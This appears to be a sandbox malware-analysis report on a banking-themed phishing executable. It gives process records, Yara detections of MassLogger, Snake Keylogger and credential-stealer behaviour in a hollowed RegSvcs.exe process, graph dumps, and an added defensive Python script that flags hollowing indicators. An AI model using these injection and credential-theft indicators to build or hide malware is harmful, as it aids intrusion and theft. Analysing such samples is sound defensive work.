Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:17
Start time:03:26:11
Start date:11/12/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
Imagebase:0xfd0000
File size:45'984 bytes
MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:false

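The record for Target ID 17 is the one that matters in this list: the image on disk is the .NET utility RegSvcs.exe, but the command line is the path of the submitted sample, and every Yara hit for the family lands in that process's memory, including a region at 0x402000 that sits below RegSvcs.exe's own image base of 0xfd0000. That combination (image name not matching the command line, plus detections in memory the host image does not own) is the classic trace of a hollowed or injected host process. The script below is an added example, not Joe Sandbox code, that parses process records in the report's own key:value layout and flags those two indicators. Its input is two records copied from this page (Target IDs 10 and 17). It assumes a layout for the .sdmp source names that this page does not document: the first dotted field is the target ID in hex, the fourth is the region's base address, and the fifth is a Win32 PAGE_* protection constant. Since the record carries no SizeOfImage, it uses the on-disk file size as a lower bound for the mapped image when deciding whether a hit lies outside the host image.

```python
"""Flag process-hollowing indicators in Joe Sandbox style process records.

Added example, not Joe Sandbox code. The .sdmp field layout below is an
assumption, not something this report documents:
  field 1 = target ID (hex), field 4 = region base (hex), field 5 = PAGE_* protect (hex).
"""
import re

# Constructed input: two records copied from the report's process list.
RECORDS = r"""
Target ID:10
Path:C:\Windows\System32\FXSSVC.exe
Commandline:C:\Windows\system32\fxssvc.exe
Imagebase:0x140000000
File size:1'242'624 bytes

Target ID:17
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Commandline:"C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
Imagebase:0xfd0000
File size:45'984 bytes
Yara matches:
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
"""

# Subset of the Win32 PAGE_* memory-protection constants.
PAGE_PROTECT = {0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
YARA_RE = re.compile(r"Rule: (?P<rule>[^,]+), Description: (?P<desc>.*?), Source: (?P<src>\S+), Author:")


def parse_records(text):
    """Split report text into one dict per process; Yara bullets become a list."""
    records, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("Target ID:"):
            cur = {"Yara matches": []}
            records.append(cur)
        if line.startswith("•"):
            m = YARA_RE.search(line)
            if m:
                cur["Yara matches"].append(m.groupdict())
            continue
        key, _, value = line.partition(":")  # split on the first colon only: values contain "C:\..."
        if key != "Yara matches":
            cur[key] = value.strip()
    return records


def cmdline_image(cmdline):
    """Executable named by a Windows command line, quoted or bare."""
    m = re.match(r'"([^"]+)"|(\S+)', cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(record):
    """Return indicator strings for one process record (empty list = nothing suspicious)."""
    findings = []
    tid = int(record["Target ID"])
    image = basename(record["Path"])
    launched = basename(cmdline_image(record["Commandline"]))
    if image != launched:
        findings.append(f"image {image} does not match command line {launched}: hollowing/masquerade")
    base = int(record["Imagebase"], 16)
    size = int(record["File size"].split()[0].replace("'", ""))  # "45'984 bytes" -> 45984
    for hit in record["Yara matches"]:
        f = hit["src"].split(".")
        src_tid, region, prot = int(f[0], 16), int(f[3], 16), int(f[4], 16)  # assumed layout
        if src_tid != tid:
            findings.append(f"{hit['rule']}: dump belongs to target {src_tid}, not {tid}")
        # File size is only a lower bound for SizeOfImage, so "outside" is certain below
        # the base and probable far above it; both apply to this record.
        where = "inside" if base <= region < base + size else "outside"
        findings.append(f"{hit['rule']} at 0x{region:x} ({PAGE_PROTECT.get(prot, hex(prot))}) {where} host image")
    return findings


if __name__ == "__main__":
    for rec in parse_records(RECORDS):
        for finding in analyze(rec):
            print(f"Target {rec['Target ID']}: {finding}")
```

Run as-is it reports nothing for Target 10 (fxssvc.exe launched as fxssvc.exe, no Yara hits) and three lines for Target 17: the RegSvcs.exe/sample-name mismatch, a PAGE_READWRITE heap hit at 0x347b000, and an executable-writable hit at 0x402000 below the host's image base, which is the mapped payload rather than RegSvcs.exe itself. The same mismatch check is the first thing to run on a live host: compare each process's image path with the executable its command line names, and treat a .NET framework utility launched with a document-named command line as a hollowing candidate before looking at memory.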
Target ID:18
Start time:03:26:12
Start date:11/12/2024
Path:C:\Windows\System32\snmptrap.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\snmptrap.exe
Imagebase:0x140000000
File size:1'302'528 bytes
MD5 hash:C3DD833FAFF8B6217772A5E66FF25F25
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:19
Start time:03:26:13
Start date:11/12/2024
Path:C:\Windows\System32\Spectrum.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\spectrum.exe
Imagebase:0x140000000
File size:1'455'616 bytes
MD5 hash:72181D2F9FF55560F9C4B3AB19C98A62
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:21
Start time:03:26:13
Start date:11/12/2024
Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
Imagebase:0x140000000
File size:1'667'072 bytes
MD5 hash:2DAADB2D9EE99D7F3C6EB0FA254025A1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:22
Start time:03:26:14
Start date:11/12/2024
Path:C:\Windows\System32\TieringEngineService.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\TieringEngineService.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'611'264 bytes
                                                                                                                                                                              MD5 hash:5E4593411714FE016FDCC665AFE5D552
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:23
                                                                                                                                                                              Start time:03:26:15
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\AgentService.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\AgentService.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'801'216 bytes
                                                                                                                                                                              MD5 hash:8311FBEB6995BA81570173720F2B188B
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:24
                                                                                                                                                                              Start time:03:26:15
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\vds.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\vds.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'303'552 bytes
                                                                                                                                                                              MD5 hash:D2428B28D20D38757D35F80B6491A864
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:26
                                                                                                                                                                              Start time:03:26:17
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\wbengine.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\system32\wbengine.exe"
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:2'164'736 bytes
                                                                                                                                                                              MD5 hash:7FEABE370E82D30A720E4A9459EFC1EB
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false


Execution Graph

Execution Coverage: 5.2%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 53
Total number of Limit Nodes: 4
                                                                                                                                                                                execution_graph 3866 7483e7 3869 7481e5 3866->3869 3867 74830b CloseHandle 3867->3869 3868 748212 GetTokenInformation 3868->3869 3869->3867 3869->3868 3870 748357 GetTokenInformation 3869->3870 3871 7481f7 3869->3871 3870->3869 3872 745d50 CreateThread 3876 745bbc 3872->3876 3873 745cd4 CreateThread CloseHandle 3873->3876 3874 745c2c 3875 745d56 CreateThread 3875->3876 3876->3872 3876->3873 3876->3874 3876->3875 3917 745d22 3918 745cd4 CreateThread CloseHandle 3917->3918 3921 745bbc 3917->3921 3918->3921 3919 745c2c 3920 745d56 CreateThread 3920->3921 3921->3918 3921->3919 3921->3920 3922 745d50 CreateThread 3921->3922 3922->3921 3941 7481e3 3944 7481e5 3941->3944 3942 748357 GetTokenInformation 3942->3944 3943 74830b CloseHandle 3943->3944 3944->3942 3944->3943 3945 7481f7 3944->3945 3946 748212 GetTokenInformation 3944->3946 3946->3944 3947 7458de 3948 7553f0 VirtualAlloc 3947->3948 3949 7458f9 3948->3949 3950 7481c0 3 API calls 3949->3950 3951 745907 3950->3951 3877 745b8f 3890 7553f0 3877->3890 3879 745baf 3895 7481c0 3879->3895 3881 745c2c 3882 745c85 3901 745990 3882->3901 3884 745dcd 3884->3884 3885 745c20 3885->3881 3885->3882 3886 745bbc 3885->3886 3886->3881 3887 745cd4 CreateThread CloseHandle 3886->3887 3888 745d56 CreateThread 3886->3888 3889 745d50 CreateThread 3886->3889 3887->3886 3888->3886 3889->3886 3891 7553f4 3890->3891 3892 75545e VirtualAlloc 3891->3892 3894 7553f6 3891->3894 3893 755460 3892->3893 3893->3891 3894->3879 3898 7481e5 3895->3898 3896 748357 GetTokenInformation 3896->3898 3897 74830b CloseHandle 3897->3898 3898->3885 3898->3896 3898->3897 3899 748212 GetTokenInformation 3898->3899 3900 7481f7 3898->3900 3899->3898 3900->3885 3903 745994 wcscpy 3901->3903 3902 745a23 3902->3884 3903->3902 3904 745a8d VirtualAlloc 3903->3904 3904->3903

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                control_flow_graph 726 745346-745359 727 7454cf 726->727 728 74535f 726->728 729 745335 727->729 730 7454d5 727->730 731 745361 728->731 732 745363 728->732 734 7453ef-7453f8 729->734 730->729 733 7454db 730->733 731->732 735 745369-74536d 732->735 736 7454ab-7454b9 732->736 738 7454dc-7454dd 733->738 739 745377 734->739 735->736 743 745373 735->743 737 7454bb 736->737 741 7454e2 737->741 742 7454bd-7454c3 737->742 744 74531e-74547b 739->744 745 745379-74543f 739->745 750 780cf5-780d02 741->750 742->738 743->739 755 745481 744->755 756 745309-745313 744->756 748 745445 745->748 749 7453a9-745419 745->749 748->749 751 74544b-74544f 748->751 749->742 757 74541f 749->757 758 7453a4 751->758 755->756 761 745487 755->761 759 745315-7453ed 756->759 760 7452f2-745408 756->760 757->744 763 7453a6 758->763 764 74538d 758->764 759->734 769 74540e-745461 760->769 770 74532f-745344 760->770 771 74548e-74549f 761->771 763->764 768 7453a7-7453a8 763->768 766 7453c2-7453cb 764->766 767 74538f-7453a3 764->767 766->741 773 7453d1 766->773 767->758 768->750 769->742 775 745463 769->775 771->737 778 745471 773->778 779 7452fe 773->779 775->770 777 745469 775->777 777->770 781 74546f 777->781 778->771 779->778 780 745304-74538b 779->780 780->764 781->778
Memory Dump Source
• Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 908c24f0ecee5e6f2dddf1d8173b17ebe70cd201337ab44e3e024085c5e0ca95
• Instruction ID: e1031d5fe19552e227dd6214edd315e3fc7bcf707d2bbe50b1b7f46eec06dca6
• Opcode Fuzzy Hash: 908c24f0ecee5e6f2dddf1d8173b17ebe70cd201337ab44e3e024085c5e0ca95
• Instruction Fuzzy Hash: 57412A5250DED18FC7268A2C58643B06B909B223EAF5901D7E4C3CF0E3E39C4C94A327

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                control_flow_graph 0 7481c0-7481d8 1 7481e5 0->1 2 7483bf-7483ca 0->2 3 7482a3-7482a5 1->3 4 7481eb 1->4 10 748277-74827a 2->10 11 7483d0 2->11 6 7483f9 3->6 7 7482ab 3->7 8 7481f1 4->8 9 7482b2-7482bc 4->9 16 7482d2-7482d7 6->16 17 7483ff 6->17 7->6 12 7482b1 7->12 8->9 15 7481f7-74828e 8->15 13 7482c5-7482c8 9->13 14 748357-74836f GetTokenInformation 9->14 21 748241 10->21 22 74827c 10->22 11->10 19 7483d6 11->19 12->9 13->6 20 7482ce 13->20 31 748376-74837b 14->31 18 748306-748309 16->18 24 74f524-74f52e 17->24 25 74832e-748330 18->25 26 74830b-748311 CloseHandle 18->26 27 7483d7-7483dd 19->27 28 7482d0 20->28 29 74828f-748303 call 7772ec 20->29 21->31 32 748251-748256 call 7772f4 21->32 22->21 30 74827e 22->30 33 74f807 24->33 40 748332 25->40 41 7482dd-7482e3 25->41 26->25 27->6 28->16 28->29 29->18 61 74834f-748355 29->61 30->26 37 748284 30->37 38 7482f0-74831c 31->38 39 748381 31->39 51 74825b-748260 32->51 35 74f80d 33->35 36 74f8df-74f8e0 33->36 35->36 44 74f813 35->44 56 7515a5-7515aa 36->56 37->25 38->1 65 748322 38->65 39->38 48 748387 39->48 40->41 50 748334 40->50 46 7483a3-7483a4 41->46 47 7482e9 41->47 57 74f78f 44->57 58 74f81b 44->58 46->24 47->46 55 7482ef 47->55 48->10 52 748390-748393 48->52 50->24 51->52 52->30 60 748399 52->60 55->38 62 7515ae-7515af 56->62 57->58 64 74f795 57->64 58->36 60->30 66 74839f-7483a1 60->66 69 748341 61->69 70 748212-74821a GetTokenInformation 61->70 63 7515b2-7515b7 62->63 68 7515ba-7515c1 63->68 64->33 65->1 71 748328-74832c 65->71 66->46 72 7515c7-7515d2 68->72 73 751750-7517a2 call 7772f4 68->73 69->70 74 748347 69->74 75 748220-748234 70->75 76 7483af 70->76 71->13 71->25 79 7515d4-7515d6 72->79 80 751620-751623 72->80 81 74834d 74->81 82 751638-751640 74->82 75->27 106 74823a 75->106 76->32 77 7483b5 76->77 77->32 84 7483bb-7483bd 
77->84 86 751670-751684 79->86 87 7515dc-7515df 79->87 88 751625-751628 80->88 89 7516a0-7516b4 80->89 81->61 90 751646-75165f 82->90 91 75170e-751727 82->91 84->2 86->56 99 75168a-75168d 86->99 87->68 94 7515e1-7515f6 87->94 88->68 96 75162a-751636 88->96 92 7516f4-7516f5 89->92 93 7516b6-7516b9 89->93 90->72 98 751665 90->98 91->72 97 75172d 91->97 110 7516fe-75170c 92->110 102 7516bb 93->102 103 75173a-75173b 93->103 104 7516d2-7516d7 94->104 105 7515fc-751600 94->105 96->82 107 7516dc-7516ec 96->107 97->73 98->73 100 751693-751697 99->100 101 75172f-751738 99->101 108 7516bf-7516cd 100->108 113 75173f-751740 101->113 102->108 103->113 104->62 109 751606-751618 105->109 105->110 106->27 112 748240 106->112 107->72 111 7516f2 107->111 109->63 114 751744-751748 110->114 111->73 115 75b32e-75b330 112->115 113->114 116 75b300 115->116 117 75b332-75b337 call 7772f4 115->117 121 75b302 116->121 122 75b2fd 116->122 117->116 123 75b339 117->123 124 75b305 122->124 125 75b2ff 122->125 123->116 126 75b33b-75b33f 123->126 127 75b322-75b32d 124->127 128 75b308-75b315 124->128 125->128 126->128 127->115 128->124 130 75b317 128->130 130->122
Memory Dump Source
• Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
• Instruction ID: e0f972ea86c65c5f3b3e7f08fd8fbeb6e0701ca9383a63031a1680a45b94bc3d
• Opcode Fuzzy Hash: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
• Instruction Fuzzy Hash: 6CB1F53050CA4D8BDB69CF1C84802BDB7A1FF95316F688259D89B87166EFAC9C06D353

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                control_flow_graph 131 745b8f-745c20 call 7553f0 call 778358 call 760320 call 7481c0 141 745cf4-745d08 call 7772ec 131->141 142 745c26 131->142 146 745c87-745dc8 call 745e60 call 745990 141->146 147 745d0e 141->147 142->141 143 745c2c-745c2f 142->143 161 745dcd 146->161 147->146 149 745d14-745d18 147->149 153 745c65 149->153 154 745daf-745db6 call 7452d0 149->154 157 745c67 153->157 158 745ca3 call 745df0 153->158 163 745c30-745c39 154->163 164 745dbc 154->164 157->158 162 745c69-745c72 157->162 173 745c45-745d6d call 761520 158->173 161->161 166 745c97-745c9d 162->166 167 745c78 162->167 187 745bf7 163->187 188 745cb9-745cbd 163->188 170 745d7d-745d89 164->170 171 745dbe 164->171 181 745c85 166->181 182 745c9f 166->182 168 745c7e 167->168 169 745d1f-745d45 167->169 168->169 175 745c84-745d5b CreateThread 168->175 189 745cd4-745cea CreateThread CloseHandle 169->189 190 745d47 169->190 183 745d94 170->183 184 745d8b-745d92 170->184 171->170 186 745d9b 171->186 198 745bfd-745c06 173->198 201 745d73 173->201 175->167 181->146 182->181 193 745ca1 182->193 183->143 199 745cb3 183->199 184->183 195 745d9c 184->195 186->195 187->188 187->198 191 745d56-745d5b CreateThread 188->191 192 745cc3 188->192 189->184 202 745cf0-745d4d 189->202 190->189 191->167 192->191 200 745cc9 192->200 193->158 206 745da5-745da8 195->206 198->206 199->143 199->188 200->191 201->198 204 745d79-745d7b 201->204 202->183 204->170 206->154
APIs
Memory Dump Source
• Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
• Instruction ID: 3f449fd5eb5a89fa093c52e680b9c6f15d11c346f3560881881bf74a59727703
• Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
• Instruction Fuzzy Hash: FB41C521B18F0A8FDB68973898DD73936D1EF59310F5805AAD41BCB1A3DB6C8C05CB62

Control-flow Graph (graph rendering omitted; nodes reference CreateThread and CloseHandle)
APIs
Memory Dump Source
• Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
Similarity
• API ID: CreateThread$CloseHandle
• String ID:
• API String ID: 738052048-0
• Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
• Instruction ID: a992006c35e504fe0ee78df37e984d30476cb127c70fbbddb4e8d9b0552c0fdb
• Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
• Instruction Fuzzy Hash: B0F0F620F1CE0B87DB2C87388CD933A62C1AF99361F650B1ED027C90E3DB2C49059A15

Control-flow Graph (graph rendering omitted; nodes reference CreateThread and CloseHandle)
APIs
Memory Dump Source
• Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
Similarity
• API ID: CreateThread$CloseHandle
• String ID:
• API String ID: 738052048-0
• Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
• Instruction ID: 8bfcde08ac16ae41e15e73084c44a17a80bfa06526b9cfbbbd12092e997ff8d8
• Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
• Instruction Fuzzy Hash: B4B01200A28F8B87012D173004C812806802E46638A741F6DDF73078E3DB0C0C046B30

Control-flow Graph (graph rendering omitted; nodes reference VirtualAlloc)
APIs
Memory Dump Source
• Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
• Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
• Instruction ID: d3326afdd22336f733e286be15113a5c04d710070524368559eef70306b5e1b0
• Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
• Instruction Fuzzy Hash: 7F21EA3171DE848FC76A932844D92B52EA2F795324F9D83CBD08ADB293DB2C4D05D242

Control-flow Graph (graph rendering omitted; nodes reference CloseHandle and GetTokenInformation)
APIs
Memory Dump Source
• Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
• Instruction ID: 20bfc23f5f6318248f584cd5185995d36bd6232891c7ea64999b736255bba794
• Opcode Fuzzy Hash: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
• Instruction Fuzzy Hash: 72F0A43590DA99CFDAAA9B18945053EABA0BF91710B5D009AD446CB113CF2C9C01D753

Control-flow Graph (graph rendering omitted; nodes reference CloseHandle and GetTokenInformation)
APIs
• CloseHandle.KERNELBASE ref: 0074830B
• GetTokenInformation.KERNELBASE ref: 00748369
Memory Dump Source
• Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
Similarity
• API ID: CloseHandleInformationToken
• String ID:
• API String ID: 3954737543-0
• Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
• Instruction ID: 89681f1f034b7f9b734e47663de04f03086af1d69eb4c92526bba67fce25b068
• Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
• Instruction Fuzzy Hash: DBF09A3480DA4DCB8AA68A18984063E77A4BF61754B6C006AC846CF122CF2CDC02EB53

Control-flow Graph (graph rendering omitted; nodes reference CloseHandle and GetTokenInformation)
APIs
Memory Dump Source
• Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
• Instruction ID: d0993578d4214e89461e15f2a42099941ab94f4f7d0441e3f9b181f78090b28a
• Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
• Instruction Fuzzy Hash: E0F09A3590CA4DCB8ABA8A089440A3E6BA4BB61704B6C009AC456CF122CF6CEC02E753
APIs
Memory Dump Source
• Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
Similarity
• API ID: _clrfp
• String ID:
• API String ID: 3618594692-0
• Opcode ID: eb89a8a385eca23818c00267d82649db9f1e568ecff9ee33809bd01fc8c9252f
• Instruction ID: 278c6a852ef54643616afc8d3b10171b507e5fbdb68b51814b35208eccdade8b
• Opcode Fuzzy Hash: eb89a8a385eca23818c00267d82649db9f1e568ecff9ee33809bd01fc8c9252f
• Instruction Fuzzy Hash: 0DB16731620A4DCFDF99CF1CC88AB6677E1FB49344B598599E85DCB262C339D852CB01

Execution Graph

Execution Coverage: 5.1%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 66
Total number of Limit Nodes: 4

Control-flow Graph

Memory Dump Source
• Source File: 0000000B.00000002.3357007123.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_890000_elevation_service.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
• Instruction ID: 6a51d790b5dbe5ee762e12d94b461db000525e595eb8b6c007d57ca801706afe
• Opcode Fuzzy Hash: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
• Instruction Fuzzy Hash: 60B1153051CA4ACBEF29DB5C8484235B7A1FFA7318F2C8259D48BC7A66DE24DC02D352

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000B.00000002.3357007123.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_890000_elevation_service.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
• Instruction ID: 906209a43a483aeb561a01a8c4c0c4d44e20d0579002baf152acb6d1da492f27
• Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
• Instruction Fuzzy Hash: 6441E520608F0D8FDF6BB72C945973936E0FB9932CF5C01BAE406CB1A5DB248D059752

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000B.00000002.3357007123.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_890000_elevation_service.jbxd
Similarity
• API ID: CreateThread$CloseHandle
• String ID:
• API String ID: 738052048-0
• Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
• Instruction ID: 1f4e436377805d58bd9129795b00b774f02b0d0c2c894cf141eb7cccbb690aaa
• Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
• Instruction Fuzzy Hash: A3F0F02161CE0986DF3FB738985933A62C1F79933DF6C0B3ED057C90E8EA2489029309

Control-flow Graph

APIs
Memory Dump Source
